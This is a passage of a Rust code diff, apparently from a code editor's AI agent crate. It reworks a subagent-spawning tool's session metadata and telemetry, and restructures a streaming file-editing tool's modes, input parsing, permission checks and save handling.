#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] pub struct SpawnAgentToolInput { /// Short label displayed in the UI while the agent runs (e.g., "Researching alternatives") pub label: String, @@ -34,26 +46,46 @@ pub struct SpawnAgentToolInput { pub session_id: Option, } -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +#[derive(Debug, Clone, Serialize, Deserialize)] #[serde(untagged)] +#[serde(rename_all = "snake_case")] pub enum SpawnAgentToolOutput { Success { session_id: acp::SessionId, output: String, + session_info: SubagentSessionInfo, }, Error { #[serde(skip_serializing_if = "Option::is_none")] #[serde(default)] session_id: Option, error: String, + session_info: Option, }, } impl From for LanguageModelToolResultContent { fn from(output: SpawnAgentToolOutput) -> Self { - serde_json::to_string(&output) + match output { + SpawnAgentToolOutput::Success { + session_id, + output, + session_info: _, // Don't show this to the model + } => serde_json::to_string( + &serde_json::json!({ "session_id": session_id, "output": output }), + ) + .unwrap_or_else(|e| format!("Failed to serialize spawn_agent output: {e}")) + .into(), + SpawnAgentToolOutput::Error { + session_id, + error, + session_info: _, // Don't show this to the model + } => serde_json::to_string( + &serde_json::json!({ "session_id": session_id, "error": error }), + ) .unwrap_or_else(|e| format!("Failed to serialize spawn_agent output: {e}")) - .into() + .into(), + } } } @@ -83,9 +115,14 @@ impl AgentTool for SpawnAgentTool { input: Result, _cx: &mut App, ) -> SharedString { - input - .map(|i| i.label.into()) - .unwrap_or_else(|_| "Spawning agent".into()) + match input { + Ok(i) => i.label.into(), + Err(value) => value + .get("label") + .and_then(|v| v.as_str()) + .map(|s| SharedString::from(s.to_owned())) + .unwrap_or_else(|| "Spawning agent".into()), + } } fn run( @@ -101,9 +138,10 @@ impl AgentTool for SpawnAgentTool { .map_err(|e| 
SpawnAgentToolOutput::Error { session_id: None, error: format!("Failed to receive tool input: {e}"), + session_info: None, })?; - let (subagent, subagent_session_id) = cx.update(|cx| { + let (subagent, mut session_info) = cx.update(|cx| { let subagent = if let Some(session_id) = input.session_id { self.environment.resume_subagent(session_id, cx) } else { @@ -112,40 +150,73 @@ impl AgentTool for SpawnAgentTool { let subagent = subagent.map_err(|err| SpawnAgentToolOutput::Error { session_id: None, error: err.to_string(), + session_info: None, })?; - let subagent_session_id = subagent.id(); + let session_info = SubagentSessionInfo { + session_id: subagent.id(), + message_start_index: subagent.num_entries(cx), + message_end_index: None, + }; - event_stream.subagent_spawned(subagent_session_id.clone()); - let meta = acp::Meta::from_iter([( - SUBAGENT_SESSION_ID_META_KEY.into(), - subagent_session_id.to_string().into(), - )]); - event_stream.update_fields_with_meta(acp::ToolCallUpdateFields::new(), Some(meta)); + event_stream.subagent_spawned(subagent.id()); + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new(), + Some(acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + serde_json::json!(&session_info), + )])), + ); - Ok((subagent, subagent_session_id)) + Ok((subagent, session_info)) })?; - match subagent.send(input.message, cx).await { - Ok(output) => { - event_stream.update_fields( - acp::ToolCallUpdateFields::new().content(vec![output.clone().into()]), - ); + let send_result = subagent.send(input.message, cx).await; + + let status = if send_result.is_ok() { + "completed" + } else { + "error" + }; + telemetry::event!( + "Subagent Completed", + subagent_session = session_info.session_id.to_string(), + status, + ); + + session_info.message_end_index = + cx.update(|cx| Some(subagent.num_entries(cx).saturating_sub(1))); + + let meta = Some(acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + 
serde_json::json!(&session_info), + )])); + + let (output, result) = match send_result { + Ok(output) => ( + output.clone(), Ok(SpawnAgentToolOutput::Success { - session_id: subagent_session_id, + session_id: session_info.session_id.clone(), + session_info, output, - }) - } + }), + ), Err(e) => { let error = e.to_string(); - event_stream.update_fields( - acp::ToolCallUpdateFields::new().content(vec![error.clone().into()]), - ); - Err(SpawnAgentToolOutput::Error { - session_id: Some(subagent_session_id), - error, - }) + ( + error.clone(), + Err(SpawnAgentToolOutput::Error { + session_id: Some(session_info.session_id.clone()), + error, + session_info: Some(session_info), + }), + ) } - } + }; + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new().content(vec![output.into()]), + meta, + ); + result }) } @@ -156,25 +227,29 @@ impl AgentTool for SpawnAgentTool { event_stream: ToolCallEventStream, _cx: &mut App, ) -> Result<()> { - let session_id = match &output { - SpawnAgentToolOutput::Success { session_id, .. } => Some(session_id), - SpawnAgentToolOutput::Error { session_id, .. } => session_id.as_ref(), + let (content, session_info) = match output { + SpawnAgentToolOutput::Success { + output, + session_info, + .. + } => (output.into(), Some(session_info)), + SpawnAgentToolOutput::Error { + error, + session_info, + .. + } => (error.into(), session_info), }; - if let Some(session_id) = session_id { - event_stream.subagent_spawned(session_id.clone()); - let meta = acp::Meta::from_iter([( - SUBAGENT_SESSION_ID_META_KEY.into(), - session_id.to_string().into(), - )]); - event_stream.update_fields_with_meta(acp::ToolCallUpdateFields::new(), Some(meta)); - } - - let content = match &output { - SpawnAgentToolOutput::Success { output, .. } => output.into(), - SpawnAgentToolOutput::Error { error, .. 
} => error.into(), - }; - event_stream.update_fields(acp::ToolCallUpdateFields::new().content(vec![content])); + let meta = session_info.map(|session_info| { + acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + serde_json::json!(&session_info), + )]) + }); + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new().content(vec![content]), + meta, + ); Ok(()) } diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 20dfe0ab18aa05e6b90125f1c50a1b8a66ab25f9..47da35bbf25ad188f3f6b98e843b2955910bb7ac 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -1,13 +1,19 @@ use super::edit_file_tool::EditFileTool; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; +use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; +use crate::ToolInputPayload; use crate::{ AgentTool, Thread, ToolCallEventStream, ToolInput, - edit_agent::streaming_fuzzy_matcher::StreamingFuzzyMatcher, + edit_agent::{ + reindent::{Reindenter, compute_indent_delta}, + streaming_fuzzy_matcher::StreamingFuzzyMatcher, + }, }; use acp_thread::Diff; +use action_log::ActionLog; use agent_client_protocol::{self as acp, ToolCallLocation, ToolCallUpdateFields}; -use anyhow::{Context as _, Result, anyhow}; +use anyhow::Result; use collections::HashSet; use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; @@ -15,16 +21,20 @@ use language::language_settings::{self, FormatOnSave}; use language::{Buffer, LanguageRegistry}; use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{Project, ProjectPath}; +use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::{ + Deserialize, Deserializer, Serialize, + 
de::{DeserializeOwned, Error as _}, +}; use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; -use text::{BufferSnapshot, ToOffset as _}; +use streaming_diff::{CharOperation, StreamingDiff}; +use text::ToOffset; use ui::SharedString; use util::rel_path::RelPath; -use util::{Deferred, ResultExt, debug_panic}; +use util::{Deferred, ResultExt}; const DEFAULT_UI_TEXT: &str = "Editing file"; @@ -67,49 +77,57 @@ pub struct StreamingEditFileToolInput { /// /// `frontend/db.js` /// - pub path: String, + pub path: PathBuf, /// The mode of operation on the file. Possible values: - /// - 'create': Create a new file if it doesn't exist. Requires 'content' field. - /// - 'overwrite': Replace the entire contents of an existing file. Requires 'content' field. + /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. pub mode: StreamingEditFileMode, - /// The complete content for the new file (required for 'create' and 'overwrite' modes). + /// The complete content for the new file (required for 'write' mode). /// This field should contain the entire file content. #[serde(default, skip_serializing_if = "Option::is_none")] pub content: Option, /// List of edit operations to apply sequentially (required for 'edit' mode). /// Each edit finds `old_text` in the file and replaces it with `new_text`. 
- #[serde(default, skip_serializing_if = "Option::is_none")] - pub edits: Option>, + #[serde( + default, + skip_serializing_if = "Option::is_none", + deserialize_with = "deserialize_optional_vec_or_json_string" + )] + pub edits: Option>, } -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum StreamingEditFileMode { - /// Create a new file if it doesn't exist - Create, - /// Replace the entire contents of an existing file - Overwrite, + /// Overwrite the file with new content (replacing any existing content). + /// If the file does not exist, it will be created. + Write, /// Make granular edits to an existing file Edit, } /// A single edit operation that replaces old text with new text +/// Properly escape all text fields as valid JSON strings. +/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct EditOperation { +pub struct Edit { /// The exact text to find in the file. This will be matched using fuzzy matching /// to handle minor differences in whitespace or formatting. 
+ /// + /// Be minimal with replacements: + /// - For unique lines, include only those lines + /// - For non-unique lines, include enough context to identify them pub old_text: String, /// The text to replace it with pub new_text: String, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] struct StreamingEditFileToolPartialInput { #[serde(default)] display_description: Option, @@ -118,140 +136,188 @@ struct StreamingEditFileToolPartialInput { #[serde(default)] mode: Option, #[serde(default)] - #[allow(dead_code)] content: Option, - #[serde(default)] - edits: Option>, + #[serde(default, deserialize_with = "deserialize_optional_vec_or_json_string")] + edits: Option>, } -#[derive(Default, Debug, Deserialize)] -struct PartialEditOperation { +#[derive(Clone, Default, Debug, Deserialize)] +pub struct PartialEdit { #[serde(default)] - old_text: Option, + pub old_text: Option, #[serde(default)] - new_text: Option, + pub new_text: Option, +} + +/// Sometimes the model responds with a stringified JSON array of edits (`"[...]"`) instead of a regular array (`[...]`) +fn deserialize_optional_vec_or_json_string<'de, T, D>( + deserializer: D, +) -> Result>, D::Error> +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + #[derive(Deserialize)] + #[serde(untagged)] + enum VecOrJsonString { + Vec(Vec), + String(String), + } + + let value = Option::>::deserialize(deserializer)?; + match value { + None => Ok(None), + Some(VecOrJsonString::Vec(items)) => Ok(Some(items)), + Some(VecOrJsonString::String(string)) => serde_json::from_str::>(&string) + .map(Some) + .map_err(|error| { + D::Error::custom(format!("failed to parse stringified edits array: {error}")) + }), + } } -enum StreamingEditState { - Idle, - BufferResolved { - abs_path: PathBuf, - buffer: Entity, +#[derive(Debug, Serialize, Deserialize)] +#[serde(untagged)] +pub enum StreamingEditFileToolOutput { + Success { + #[serde(alias = "original_path")] + input_path: PathBuf, + new_text: 
String, old_text: Arc, - diff: Entity, - mode: StreamingEditFileMode, - last_content_len: usize, - edit_state: IncrementalEditState, - _finalize_diff_guard: Deferred>, + #[serde(default)] + diff: String, + }, + Error { + error: String, + #[serde(default)] + input_path: Option, + #[serde(default)] + diff: String, }, } -#[derive(Default)] -struct IncrementalEditState { - in_progress_matcher: Option, - last_old_text_len: usize, - applied_ranges: Vec>, +impl StreamingEditFileToolOutput { + pub fn error(error: impl Into) -> Self { + Self::Error { + error: error.into(), + input_path: None, + diff: String::new(), + } + } } -impl IncrementalEditState { - fn applied_count(&self) -> usize { - self.applied_ranges.len() +impl std::fmt::Display for StreamingEditFileToolOutput { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + StreamingEditFileToolOutput::Success { + diff, input_path, .. + } => { + if diff.is_empty() { + write!(f, "No edits were made.") + } else { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } + } + StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } => { + write!(f, "{error}\n")?; + if let Some(input_path) = input_path + && !diff.is_empty() + { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } else { + write!(f, "No edits were made.") + } + } + } } } -impl StreamingEditState { - async fn finalize( - &mut self, - input: StreamingEditFileToolInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let remaining_edits_start_ix = match self { - StreamingEditState::Idle => { - *self = Self::transition_to_buffer_resolved( - &input.path, - &input.display_description, - input.mode.clone(), - tool, - event_stream, - cx, - ) - .await?; - 0 - } - StreamingEditState::BufferResolved { edit_state, .. 
} => edit_state.applied_count(), - }; +impl From for LanguageModelToolResultContent { + fn from(output: StreamingEditFileToolOutput) -> Self { + output.to_string().into() + } +} - let StreamingEditState::BufferResolved { - buffer, - old_text, - diff, - abs_path, - .. - } = self - else { - debug_panic!("Invalid state"); - return Ok(StreamingEditFileToolOutput::Error { - error: "Internal error. Try to apply the edits again".to_string(), - }); - }; +pub struct StreamingEditFileTool { + project: Entity, + thread: WeakEntity, + action_log: Entity, + language_registry: Arc, +} - let result: anyhow::Result = async { - let action_log = tool - .thread - .read_with(cx, |thread, _cx| thread.action_log().clone())?; +enum EditSessionResult { + Completed(EditSession), + Failed { + error: String, + session: Option, + }, +} - match input.mode { - StreamingEditFileMode::Create | StreamingEditFileMode::Overwrite => { - action_log.update(cx, |log, cx| { - log.buffer_created(buffer.clone(), cx); - }); - let content = input.content.ok_or_else(|| { - anyhow!("'content' field is required for create and overwrite modes") - })?; - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit([(0..buffer.len(), content.as_str())], None, cx); - }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); - } - StreamingEditFileMode::Edit => { - let edits = input - .edits - .ok_or_else(|| anyhow!("'edits' field is required for edit mode"))?; - - let remaining_edits = &edits[remaining_edits_start_ix..]; - apply_edits( - &buffer, - &action_log, - remaining_edits, - &diff, - event_stream, - &abs_path, - cx, - )?; - } - } +impl StreamingEditFileTool { + pub fn new( + project: Entity, + thread: WeakEntity, + action_log: Entity, + language_registry: Arc, + ) -> Self { + Self { + project, + thread, + action_log, + language_registry, + } + } - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::language_settings( - 
buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); - settings.format_on_save != FormatOnSave::Off + fn authorize( + &self, + path: &PathBuf, + description: &str, + event_stream: &ToolCallEventStream, + cx: &mut App, + ) -> Task> { + super::tool_permissions::authorize_file_edit( + EditFileTool::NAME, + path, + description, + &self.thread, + event_stream, + cx, + ) + } + + fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { + let should_update_agent_location = self + .thread + .read_with(cx, |thread, _cx| !thread.is_subagent()) + .unwrap_or_default(); + if should_update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location(Some(AgentLocation { buffer, position }), cx); }); + } + } - if format_on_save_enabled { - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); + async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { + let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); + settings.format_on_save != FormatOnSave::Off + }); - let format_task = tool.project.update(cx, |project, cx| { + if format_on_save_enabled { + self.project + .update(cx, |project, cx| { project.format( HashSet::from_iter([buffer.clone()]), LspFormatTarget::Buffers, @@ -259,546 +325,155 @@ impl StreamingEditState { FormatTrigger::Save, cx, ) - }); - futures::select! { - result = format_task.fuse() => { result.log_err(); }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - } - - let save_task = tool - .project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); - futures::select! 
{ - result = save_task.fuse() => { result?; }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - if let Some(new_mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - tool.thread.update(cx, |thread, _| { - thread - .file_read_times - .insert(abs_path.to_path_buf(), new_mtime); - })?; - } - - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } }) - .await; - - let output = StreamingEditFileToolOutput::Success { - input_path: PathBuf::from(input.path), - new_text, - old_text: old_text.clone(), - diff: unified_diff, - }; - Ok(output) + .await + .log_err(); } - .await; - result.map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - }) + + self.project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .log_err(); + + self.action_log.update(cx, |log, cx| { + log.buffer_edited(buffer.clone(), cx); + }); } - async fn process( - &mut self, - partial: StreamingEditFileToolPartialInput, - tool: &StreamingEditFileTool, + async fn process_streaming_edits( + &self, + input: &mut ToolInput, event_stream: &ToolCallEventStream, cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - match self { - Self::Idle => { - if let Some(path_str) = partial.path - && let Some(display_description) = partial.display_description - && let Some(mode) = partial.mode - { - *self = Self::transition_to_buffer_resolved( - &path_str, - &display_description, - mode, - tool, - event_stream, - cx, - ) - .await?; - } - } - Self::BufferResolved { - abs_path, - 
buffer, - edit_state, - diff, - mode, - last_content_len, - .. - } => match mode { - StreamingEditFileMode::Create | StreamingEditFileMode::Overwrite => { - if let Some(content) = &partial.content { - Self::process_streaming_content( - buffer, - diff, - last_content_len, - content, - cx, - )?; + ) -> EditSessionResult { + let mut session: Option = None; + let mut last_partial: Option = None; + + loop { + futures::select! { + payload = input.next().fuse() => { + match payload { + Ok(payload) => match payload { + ToolInputPayload::Partial(partial) => { + if let Ok(parsed) = serde_json::from_value::(partial) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); + + last_partial = Some(parsed.clone()); + + if session.is_none() + && path_complete + && let StreamingEditFileToolPartialInput { + path: Some(path), + display_description: Some(display_description), + mode: Some(mode), + .. + } = &parsed + { + match EditSession::new( + PathBuf::from(path), + display_description, + *mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => session = Some(created_session), + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + } + + if let Some(current_session) = &mut session + && let Err(error) = current_session.process(parsed, self, event_stream, cx) + { + log::error!("Failed to process edit: {}", error); + return EditSessionResult::Failed { error, session }; + } + } + } + ToolInputPayload::Full(full_input) => { + let mut session = if let Some(session) = session { + session + } else { + match EditSession::new( + full_input.path.clone(), + &full_input.display_description, + full_input.mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => created_session, + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return 
EditSessionResult::Failed { + error, + session: None, + }; + } + } + }; + + return match session.finalize(full_input, self, event_stream, cx).await { + Ok(()) => EditSessionResult::Completed(session), + Err(error) => { + log::error!("Failed to finalize edit: {}", error); + EditSessionResult::Failed { + error, + session: Some(session), + } + } + }; + } + ToolInputPayload::InvalidJson { error_message } => { + log::error!("Received invalid JSON: {error_message}"); + return EditSessionResult::Failed { + error: error_message, + session, + }; + } + }, + Err(error) => { + return EditSessionResult::Failed { + error: format!("Failed to receive tool input: {error}"), + session, + }; + } } } - StreamingEditFileMode::Edit => { - if let Some(edits) = partial.edits { - Self::process_streaming_edits( - buffer, - diff, - edit_state, - &edits, - abs_path, - tool, - event_stream, - cx, - )?; - } + _ = event_stream.cancelled_by_user().fuse() => { + return EditSessionResult::Failed { + error: "Edit cancelled by user".to_string(), + session, + }; } - }, + } } - Ok(()) } +} - async fn transition_to_buffer_resolved( - path_str: &str, - display_description: &str, - mode: StreamingEditFileMode, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let path = PathBuf::from(path_str); - let project_path = cx - .update(|cx| resolve_path(mode.clone(), &path, &tool.project, cx)) - .map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - })?; - - let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) - else { - return Err(StreamingEditFileToolOutput::Error { - error: format!("File '{path_str}' does not exist"), - }); - }; - - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), - ); - - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - 
error: e.to_string(), - })?; - - let buffer = tool - .project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - })?; - - ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let finalize_diff_guard = util::defer(Box::new({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }) as Box); +impl AgentTool for StreamingEditFileTool { + type Input = StreamingEditFileToolInput; + type Output = StreamingEditFileToolOutput; - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } - }) - .await; + const NAME: &'static str = "streaming_edit_file"; - Ok(Self::BufferResolved { - abs_path, - buffer, - old_text, - diff, - mode, - last_content_len: 0, - edit_state: IncrementalEditState::default(), - _finalize_diff_guard: finalize_diff_guard, - }) + fn supports_input_streaming() -> bool { + true } - fn process_streaming_content( - buffer: &Entity, - diff: &Entity, - last_content_len: &mut usize, - content: &str, - cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - let new_len = content.len(); - if new_len > *last_content_len { - let new_chunk = &content[*last_content_len..]; - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - // On the first update, replace the entire buffer (handles Overwrite - // clearing existing content). For Create the buffer is already empty - // so 0..0 is a no-op range prefix. 
- let insert_at = if *last_content_len == 0 { - 0..buffer.len() - } else { - let len = buffer.len(); - len..len - }; - buffer.edit([(insert_at, new_chunk)], None, cx); - }); - }); - *last_content_len = new_len; - - let anchor_range = buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_between(0..buffer.len()) - }); - diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - } - Ok(()) - } - - fn process_streaming_edits( - buffer: &Entity, - diff: &Entity, - edit_state: &mut IncrementalEditState, - edits: &[PartialEditOperation], - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - if edits.is_empty() { - return Ok(()); - } - - // Edits at indices applied_count..edits.len()-1 are newly complete - // (a subsequent edit exists, proving the LLM moved on). - // The last edit (edits.len()-1) is potentially still in progress. - let completed_count = edits.len().saturating_sub(1); - - // Apply newly-complete edits - while edit_state.applied_count() < completed_count { - let edit_index = edit_state.applied_count(); - let partial_edit = &edits[edit_index]; - - let old_text = partial_edit.old_text.clone().ok_or_else(|| { - StreamingEditFileToolOutput::Error { - error: format!("Edit at index {} is missing old_text.", edit_index), - } - })?; - let new_text = partial_edit.new_text.clone().unwrap_or_default(); - - edit_state.in_progress_matcher = None; - edit_state.last_old_text_len = 0; - - let edit_op = EditOperation { - old_text: old_text.clone(), - new_text: new_text.clone(), - }; - - let action_log = tool - .thread - .read_with(cx, |thread, _cx| thread.action_log().clone()) - .ok(); - - // On the first edit, mark the buffer as read - if edit_state.applied_count() == 0 { - if let Some(action_log) = &action_log { - action_log.update(cx, |log, cx| { - log.buffer_read(buffer.clone(), cx); - }); - } - } - - let snapshot = buffer.read_with(cx, |buffer, 
_cx| buffer.snapshot()); - - let (range, new_text) = - match resolve_and_reveal_edit(buffer, diff, &snapshot, &edit_op, cx) { - Ok(resolved) => resolved, - Err(EditResolveError::NotFound) => { - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file. \ - Please read the file again to get the current content.", - edit_index - ), - }); - } - Err(EditResolveError::Ambiguous(ranges)) => { - let lines = ranges - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Edit {} matched multiple locations in the file at lines: {}. \ - Please provide more context in old_text to uniquely \ - identify the location.", - edit_index, lines - ), - }); - } - }; - - for previous_range in &edit_state.applied_ranges { - let previous_start = previous_range.start.to_offset(&snapshot); - let previous_end = previous_range.end.to_offset(&snapshot); - if range.start < previous_end && previous_start < range.end { - let earlier_start_line = snapshot.offset_to_point(previous_start).row + 1; - let earlier_end_line = snapshot.offset_to_point(previous_end).row + 1; - let later_start_line = snapshot.offset_to_point(range.start).row + 1; - let later_end_line = snapshot.offset_to_point(range.end).row + 1; - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Conflicting edit ranges detected: lines {}-{} \ - conflicts with lines {}-{}. 
Conflicting edit \ - ranges are not allowed, as they would overwrite \ - each other.", - earlier_start_line, earlier_end_line, later_start_line, later_end_line, - ), - }); - } - } - - let anchor_range = - buffer.read_with(cx, |buffer, _cx| buffer.anchor_range_between(range.clone())); - edit_state.applied_ranges.push(anchor_range); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new() - .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), - ); - - if let Some(action_log) = action_log { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit([(range, new_text.as_str())], None, cx); - }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); - } - } - - // Feed the in-progress last edit's old_text to the matcher for live preview - if let Some(partial_edit) = edits.last() { - if let Some(old_text) = &partial_edit.old_text { - let old_text_len = old_text.len(); - if old_text_len > edit_state.last_old_text_len { - let new_chunk = &old_text[edit_state.last_old_text_len..]; - - let matcher = edit_state.in_progress_matcher.get_or_insert_with(|| { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); - StreamingFuzzyMatcher::new(snapshot) - }); - - if let Some(match_range) = matcher.push(new_chunk, None) { - let anchor_range = buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_between(match_range.clone()) - }); - diff.update(cx, |card, cx| card.reveal_range(anchor_range, cx)); - } - - edit_state.last_old_text_len = old_text_len; - } - } - } - - Ok(()) - } -} - -fn ensure_buffer_saved( - buffer: &Entity, - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - cx: &mut AsyncApp, -) -> Result<(), StreamingEditFileToolOutput> { - let check_result = tool.thread.update(cx, |thread, cx| { - let last_read = thread.file_read_times.get(abs_path).copied(); - let current = buffer - .read(cx) - .file() - .and_then(|file| 
file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (last_read, current, dirty, has_save, has_restore) - }); - - let Ok((last_read_mtime, current_mtime, is_dirty, has_save_tool, has_restore_tool)) = - check_result - else { - return Ok(()); - }; - - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." 
- } - }; - return Err(StreamingEditFileToolOutput::Error { - error: message.to_string(), - }); - } - - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - if current != last_read { - return Err(StreamingEditFileToolOutput::Error { - error: "The file has been modified since you last read it. \ - Please read the file again to get the current state before editing it." - .to_string(), - }); - } - } - - Ok(()) -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(untagged)] -pub enum StreamingEditFileToolOutput { - Success { - #[serde(alias = "original_path")] - input_path: PathBuf, - new_text: String, - old_text: Arc, - #[serde(default)] - diff: String, - }, - Error { - error: String, - }, -} - -impl std::fmt::Display for StreamingEditFileToolOutput { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - StreamingEditFileToolOutput::Success { - diff, input_path, .. - } => { - if diff.is_empty() { - write!(f, "No edits were made.") - } else { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } - } - StreamingEditFileToolOutput::Error { error } => write!(f, "{error}"), - } - } -} - -impl From for LanguageModelToolResultContent { - fn from(output: StreamingEditFileToolOutput) -> Self { - 